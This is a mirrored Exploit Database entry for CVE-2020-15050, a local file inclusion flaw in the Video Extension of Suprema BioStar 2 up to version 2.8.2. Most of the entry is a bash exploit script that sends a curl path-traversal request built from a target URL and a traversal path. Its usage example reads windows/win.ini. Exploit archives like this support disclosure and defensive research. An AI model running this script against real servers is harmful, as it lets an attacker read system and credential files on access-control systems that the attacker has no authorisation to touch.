Bio Star 2.8.2 – Local File Inclusion

• Exploit Database
• 112 阅读

• 作者： SITE Team
  日期： 2020-07-26
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/48708/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36

  # Exploit Title: Bio Star 2.8.2 - Local File Inclusion # Authors: SITE Team (Rian Saaty, Bashaer AlHarthy, Safeyah Alhazmi) # Google Dork: N/A # Date of Exploit Release: 2020-07-13 # Exploit Author: SITE Team # Vendor Homepage: https://www.supremainc.com/en/main.asp # Software Link: https://www.supremainc.com/en/support/biostar-2-pakage.asp # Version: Bio Star 2, Video Extension up to version 2.8.2 # Tested on: Windows # CVE : CVE-2020-15050     #!/bin/bash   # Exploit Title: Video Extension of Bio Star up to 2.8.1 Local File Inclusion Exploit # Authors: SITE Team (Rian Saaty, Bashaer AlHarthy, Safeyah Alhazmi) # Google Dork: N/A # Date of Exploit Release: 13/7/2020 # Exploit Author: SITE Team # Vendor Homepage: https://www.supremainc.com/en/main.asp # Software Link: https://www.supremainc.com/en/support/biostar-2-pakage.asp # Version: Bio Star 2, Video Extension up to version 2.8.1 # Tested on: Windows # CVE : CVE-2020-15050   echo "*********** SITE TEAM *********************" echo "*********** Video Extension of Bio Star 2 Local File Inclusion Exploit ***********" echo "*********** Rian Saaty, Bashaer AlHarthy, Safeyah Alhazmi*********************"   if [ -z "$*" ]; then echo "Usage Example: ./exploit.sh https://website/ ../../../../../../../../../../../../windows/win.ini" echo "*******************************************" else args=("$@") curl -X GET --path-as-is -k${args[0]}${args[1]} fi